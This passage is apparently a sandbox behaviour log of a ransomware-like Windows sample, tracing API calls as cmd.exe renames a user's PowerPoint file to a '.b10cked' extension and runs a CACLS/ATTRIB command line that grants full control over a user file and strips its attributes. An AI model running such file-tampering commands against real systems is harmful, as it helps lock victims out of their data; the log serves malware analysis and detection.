lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f9bc*="Desktop") returned 0x18 [0234.450] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.451] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f73c | out: lpFindFileData=0x22f73c) returned 0x24ffe0 [0234.451] FindClose (in: hFindFile=0x24ffe0 | out: hFindFile=0x24ffe0) returned 1 [0234.451] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f73c | out: lpFindFileData=0x22f73c) returned 0x24ffe0 [0234.451] FindClose (in: hFindFile=0x24ffe0 | out: 
hFindFile=0x24ffe0) returned 1 [0234.451] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f73c | out: lpFindFileData=0x22f73c) returned 0x24ffe0 [0234.451] FindClose (in: hFindFile=0x24ffe0 | out: hFindFile=0x24ffe0) returned 1 [0234.451] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.451] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0234.451] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0234.451] GetEnvironmentStringsW () returned 0x252ac0* [0234.451] FreeEnvironmentStringsW (penv=0x252ac0) returned 1 [0234.451] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.452] GetConsoleOutputCP () returned 0x1b5 [0234.452] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.452] GetUserDefaultLCID () returned 0x409 [0234.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0234.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22fb00, cchData=128 | out: lpLCData="0") returned 2 [0234.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22fb00, cchData=128 | out: lpLCData="0") returned 2 [0234.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22fb00, cchData=128 | out: lpLCData="1") returned 2 [0234.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0234.453] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0234.453] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0234.453] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, 
lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0234.453] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0234.453] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0234.453] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0234.453] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0234.453] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0234.453] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0234.453] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0234.454] GetConsoleTitleW (in: lpConsoleTitle=0x2408c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.454] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.454] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0234.454] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0234.454] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0234.454] _wcsicmp (_String1="move", _String2=")") returned 68 [0234.455] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0234.455] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0234.455] _wcsicmp (_String1="IF", _String2="move") returned -4 [0234.455] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0234.455] _wcsicmp (_String1="REM", _String2="move") returned 5 [0234.455] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0234.457] GetConsoleTitleW (in: lpConsoleTitle=0x22f7f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 
0x1b [0234.457] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0234.457] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0234.457] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0234.457] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0234.457] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0234.457] _wcsicmp (_String1="move", _String2="CD") returned 10 [0234.457] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0234.457] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0234.457] _wcsicmp (_String1="move", _String2="REN") returned -5 [0234.457] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0234.457] _wcsicmp (_String1="move", _String2="SET") returned -6 [0234.457] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0234.457] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0234.457] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0234.457] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0234.457] _wcsicmp (_String1="move", _String2="MD") returned 11 [0234.457] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0234.457] _wcsicmp (_String1="move", _String2="RD") returned -5 [0234.457] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0234.457] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0234.457] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0234.457] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0234.457] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0234.457] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0234.457] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0234.458] _wcsicmp (_String1="move", _String2="VER") returned -9 [0234.458] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0234.458] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0234.458] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0234.458] _wcsicmp (_String1="move", 
_String2="ENDLOCAL") returned 8 [0234.458] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0234.458] _wcsicmp (_String1="move", _String2="START") returned -6 [0234.458] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0234.458] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0234.458] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0234.459] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0234.459] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0234.459] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22f5b4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x22f5ac, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22f5ac*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0234.459] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0234.459] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0234.459] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0234.459] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0234.459] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0234.459] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0234.459] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0234.459] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0234.460] _wcsnicmp 
(_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0234.460] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0234.460] _wcsicmp (_String1="KC6Z~1.PPT", _String2=".") returned 61 [0234.460] _wcsicmp (_String1="KC6Z~1.PPT", _String2="..") returned 61 
[0234.460] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\KC6Z~1.PPT" (normalized: "c:\\users\\eebsym5\\docume~1\\kc6z~1.ppt")) returned 0x20 [0234.461] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x251d28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.461] SetErrorMode (uMode=0x0) returned 0x0 [0234.461] SetErrorMode (uMode=0x1) returned 0x0 [0234.461] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\KC6Z~1.PPT", nBufferLength=0x104, lpBuffer=0x22ef3c, lpFilePart=0x22ef24 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\KC6Z~1.PPT", lpFilePart=0x22ef24*="KC6Z~1.PPT") returned 0x24 [0234.461] SetErrorMode (uMode=0x0) returned 0x1 [0234.461] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x13 [0234.461] _wcsicmp (_String1="KC6Z~1.PPT", _String2=".") returned 61 [0234.461] _wcsicmp (_String1="KC6Z~1.PPT", _String2="..") returned 61 [0234.461] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\KC6Z~1.PPT" (normalized: "c:\\users\\eebsym5\\docume~1\\kc6z~1.ppt")) returned 0x20 [0234.461] SetErrorMode (uMode=0x0) returned 0x0 [0234.461] SetErrorMode (uMode=0x1) returned 0x0 [0234.461] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\KC6Z~1.PPT", nBufferLength=0x104, lpBuffer=0x22f3b8, lpFilePart=0x22f150 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\KC6Z~1.PPT", lpFilePart=0x22f150*="KC6Z~1.PPT") returned 0x24 [0234.461] SetErrorMode (uMode=0x0) returned 0x1 [0234.461] SetErrorMode (uMode=0x0) returned 0x0 [0234.462] SetErrorMode (uMode=0x1) returned 0x0 [0234.462] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\kC6z.pptx.b10cked", nBufferLength=0x104, lpBuffer=0x22f5c0, lpFilePart=0x22f150 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\kC6z.pptx.b10cked", lpFilePart=0x22f150*="kC6z.pptx.b10cked") returned 0x2b [0234.462] SetErrorMode (uMode=0x0) returned 0x1 [0234.462] SetLastError (dwErrCode=0x0) 
[0234.462] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\kC6z.pptx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\kc6z.pptx.b10cked")) returned 0xffffffff [0234.462] GetLastError () returned 0x2 [0234.462] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\KC6Z~1.PPT", fInfoLevelId=0x1, lpFindFileData=0x22eacc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eacc) returned 0x240eb8 [0234.462] FindNextFileW (in: hFindFile=0x240eb8, lpFindFileData=0x22eacc | out: lpFindFileData=0x22eacc) returned 0 [0234.463] GetLastError () returned 0x12 [0234.463] FindClose (in: hFindFile=0x240eb8 | out: hFindFile=0x240eb8) returned 1 [0234.463] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\KC6Z~1.PPT", fInfoLevelId=0x1, lpFindFileData=0x251ac8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x251ac8) returned 0x240eb8 [0234.464] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\kC6z.pptx.b10cked", nBufferLength=0x104, lpBuffer=0x22ed64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\kC6z.pptx.b10cked", lpFilePart=0x0) returned 0x2b [0234.464] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\kC6z.pptx", nBufferLength=0x104, lpBuffer=0x22ed64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\kC6z.pptx", lpFilePart=0x0) returned 0x23 [0234.464] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\kC6z.pptx" (normalized: "c:\\users\\eebsym5\\docume~1\\kc6z.pptx")) returned 0x20 [0234.464] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\kC6z.pptx" (normalized: "c:\\users\\eebsym5\\docume~1\\kc6z.pptx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\kC6z.pptx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\kc6z.pptx.b10cked"), dwFlags=0x3) returned 1 [0234.464] FindClose (in: hFindFile=0x240eb8 | out: hFindFile=0x240eb8) returned 1 [0234.465] _vsnwprintf (in: _Buffer=0x49fd5040, 
_BufferCount=0x103, _Format="%9d", _ArgList=0x22ed18 | out: _Buffer=" 1") returned 9 [0234.465] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.465] GetFileType (hFile=0x7) returned 0x2 [0234.695] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.696] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22eca4 | out: lpMode=0x22eca4) returned 1 [0234.696] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.696] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x22ecd8 | out: lpConsoleScreenBufferInfo=0x22ecd8) returned 1 [0234.696] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0234.696] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x22ed18 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0234.696] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49fe4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x22ecfc, lpReserved=0x0 | out: lpBuffer=0x49fe4640*, lpNumberOfCharsWritten=0x22ecfc*=0x1a) returned 1 [0234.697] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.697] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0234.697] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.697] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0234.697] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.697] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0234.697] SetConsoleInputExeNameW () returned 0x1 [0234.697] GetConsoleOutputCP () returned 0x1b5 [0234.697] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.697] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.697] exit (_Code=0) Process: id = "642" image_name = "cmd.exe" filename = 
"c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0x828" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35128 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35129 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35130 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35131 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 35132 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35133 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35134 start_va = 0x77470000 end_va = 0x77470fff entry_point = 
0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35135 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35136 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 35137 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35234 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35235 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35236 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 35237 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35238 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 35239 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35240 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35241 start_va = 0x76480000 end_va = 0x76489fff entry_point = 
0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35242 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35243 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35244 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35245 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35246 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35247 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35248 start_va = 0x340000 end_va = 0x407fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 35249 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35250 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" 
(normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35251 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 35252 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 35253 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 35254 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 35255 start_va = 0x410000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 35256 start_va = 0x520000 end_va = 0x111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 35257 start_va = 0x1120000 end_va = 0x1282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Region: id = 35522 start_va = 0x1290000 end_va = 0x155efff entry_point = 0x1290000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 882 os_tid = 0x140 [0234.639] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fd44 | out: lpSystemTimeAsFileTime=0x18fd44*(dwLowDateTime=0xbf51a2a0, dwHighDateTime=0x1d440a9)) [0234.639] GetCurrentProcessId () returned 0x828 [0234.639] GetCurrentThreadId () returned 0x140 [0234.639] GetTickCount () returned 0x40711 [0234.639] QueryPerformanceCounter (in: lpPerformanceCount=0x18fd3c | out: lpPerformanceCount=0x18fd3c*=29142789843) returned 1 [0234.639] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0234.639] __set_app_type (_Type=0x1) [0234.639] __p__fmode () returned 
0x76b331f4 [0234.639] __p__commode () returned 0x76b331fc [0234.639] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0234.640] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0234.640] GetCurrentThreadId () returned 0x140 [0234.640] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x140) returned 0x38 [0234.640] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.640] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0234.640] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.640] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0234.640] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fcd4 | out: phkResult=0x18fcd4*=0x0) returned 0x2 [0234.640] VirtualQuery (in: lpAddress=0x18fd0b, lpBuffer=0x18fca4, dwLength=0x1c | out: lpBuffer=0x18fca4*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.640] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fca4, dwLength=0x1c | out: lpBuffer=0x18fca4*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0234.640] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fca4, dwLength=0x1c | out: lpBuffer=0x18fca4*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0234.640] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18fca4, dwLength=0x1c | out: lpBuffer=0x18fca4*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, 
